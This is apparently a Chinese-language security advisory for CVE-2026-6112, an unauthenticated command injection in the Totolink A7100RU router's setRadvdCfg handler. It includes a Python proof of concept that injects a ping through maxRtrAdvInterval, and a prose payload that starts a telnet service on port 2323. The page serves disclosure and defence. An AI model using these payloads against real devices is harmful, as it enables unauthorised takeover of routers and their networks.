CVE-2026-6112 CVSS 9.8 严重

CVE-2026-6112 Totolink A7100RU OS命令注入漏洞

披露日期: 2026-04-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6112

漏洞类型

OS命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Totolink A7100RU

漏洞概述

Totolink A7100RU路由器在版本7.4cu.2313_b20191024中存在严重的操作系统命令注入漏洞。该漏洞源于/cgi-bin/cstecgi.cgi文件中setRadvdCfg函数对maxRtrAdvInterval参数的处理不当。由于缺乏有效的输入过滤，未经身份验证的远程攻击者可发送特制数据包触发漏洞，进而执行任意系统命令，导致设备被完全接管。

技术细节

该漏洞的根源在于Totolink A7100RU路由器固件中CGI处理程序的编码缺陷。受影响的组件是/cgi-bin/cstecgi.cgi，特别是负责配置路由器通告的setRadvdCfg函数。在处理HTTP POST请求中的maxRtrAdvInterval参数时，后端代码未遵循安全编程规范，直接将用户可控的输入数据传递给底层的系统调用接口（如system()函数），导致经典的命令注入场景。攻击者无需任何身份验证即可访问该接口。利用方式通常是在参数值中插入命令分隔符（如;、||或`），后接要执行的操作系统指令。例如，通过构造maxRtrAdvInterval=10;telnetd -p 2323，攻击者可开启Telnet服务。由于CVSS评分高达9.8，且影响机密性、完整性和可用性，攻击者成功利用后可获得设备的最高权限，植入后门、修改DNS设置或发起DDoS攻击，对网络安全构成严重威胁。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别暴露的Totolink A7100RU设备及其固件版本。

STEP 2

2. 发送恶意请求

攻击者向目标设备的/cgi-bin/cstecgi.cgi接口发送特制的HTTP POST请求，其中包含setRadvdCfg函数调用和注入了恶意命令的maxRtrAdvInterval参数。

STEP 3

3. 触发漏洞

目标设备未经过滤直接处理该参数，将其传递给系统Shell执行。

STEP 4

4. 执行命令

注入的恶意命令（如反弹Shell或下载恶意软件）在设备上以Root权限执行。

STEP 5

5. 建立控制

攻击者获得设备的完全控制权，可维持访问权限并进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (replace with actual target IP)
target_url = "http://192.168.0.1/cgi-bin/cstecgi.cgi"

# Headers
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": "http://192.168.0.1/"
}

# Vulnerable payload: maxRtrAdvInterval parameter with command injection
# Example payload: ;ping -c 4 8.8.8.8
data = {
    "function": "setRadvdCfg",
    "maxRtrAdvInterval": "10; ping -c 4 8.8.8.8" # Injection point
}

try:
    # Send POST request
    response = requests.post(target_url, headers=headers, data=data, timeout=5)
    
    # Check response
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check your network monitor for ICMP traffic to 8.8.8.8 to verify execution.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Totolink A7100RU 7.4cu.2313_b20191024

防御指南

临时缓解措施

在未完成固件升级前，建议将路由器放置在隔离网络环境中，避免直接暴露于互联网。同时，通过网络流量监控设备检测针对/cgi-bin/cstecgi.cgi路径的异常POST请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6112
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6112
3 Details https://www.cvedetails.com/cve/CVE-2026-6112/
4 VulDB https://vuldb.com/cve/CVE-2026-6112
5 Link https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_177/README.md
6 Link https://vuldb.com/submit/792245
7 Link https://vuldb.com/vuln/356972
8 Link https://vuldb.com/vuln/356972/cti
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表